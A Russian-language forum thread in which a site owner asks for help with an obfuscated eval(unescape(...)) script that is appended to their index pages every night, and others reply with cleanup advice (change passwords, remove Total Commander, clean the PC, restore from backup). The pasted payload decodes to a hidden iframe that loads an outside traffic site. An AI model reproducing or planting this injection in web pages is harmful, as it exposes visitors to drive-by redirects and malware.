Подскажите, может кто-то сталкивался с таким:
Уже неделю борюсь с такой проблемой, ночью на страницу index постоянно в конец файла записывается следующий скрипт
eval(u n e s c a p e("%77%69%6e%64%6f%77%2e%73%74%61%74%75%73%3d%2
7%44%6f%6e%65%27%3b%64%6f%63%75%6d%65%6e%74%2e
%77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%2
0%6e%61%6d%65%3d%63%34%66%61%65%61%36%62%37%
63%33%20%73%72%63%3d%5c%27%68%74%74%70%3a%2f
%2f%74%72%61%66%66%75%72%6c%2e%72%75%2f%73%6
%69%76%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%6
4%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29
%2a%32%33%36%38%38%29%2b%27%31%35%64%32%64
%5c%27%20%77%69%64%74%68%3d%34%32%20%68%65
%69%67%68%74%3d%35%36%34%20%73%74%79%6c%65
%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%
6e%65%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29"));
Теги скрипт я убрал и переносы строки сделал. Каждый день его из всех страниц приходится удалять, подскажите как от этого избавиться?

Попробуйте запретить всем запись в этот файл и что из этого выйдет. Если у Вас Windows, включите аудит на доступ по записи к этому файлу. Если Linux - посмотрите в логах.

Ладно, попробую. Дело в том что происходит это на 2 хостингах. Один из них не даёт изменить прав доступа.

Значит обратись к администрации этого хостинга, так как это и в их интересах.

1. НЕМЕДЛЕННО СМЕНИТЬ ПАРОЛИ
2. Удалить ТОТАЛ и не заходить с него
3. вылечить компьютер
4. не посещать более левых сайтов!

После чего один раз проредактировать весь код
( можно сравнивать файлы из бэкапа с текущими )

Вирус наверное не у хостера.
Один из ваших скриптов сам дописывает эту фигню в конец файла.


Текст там получается такой: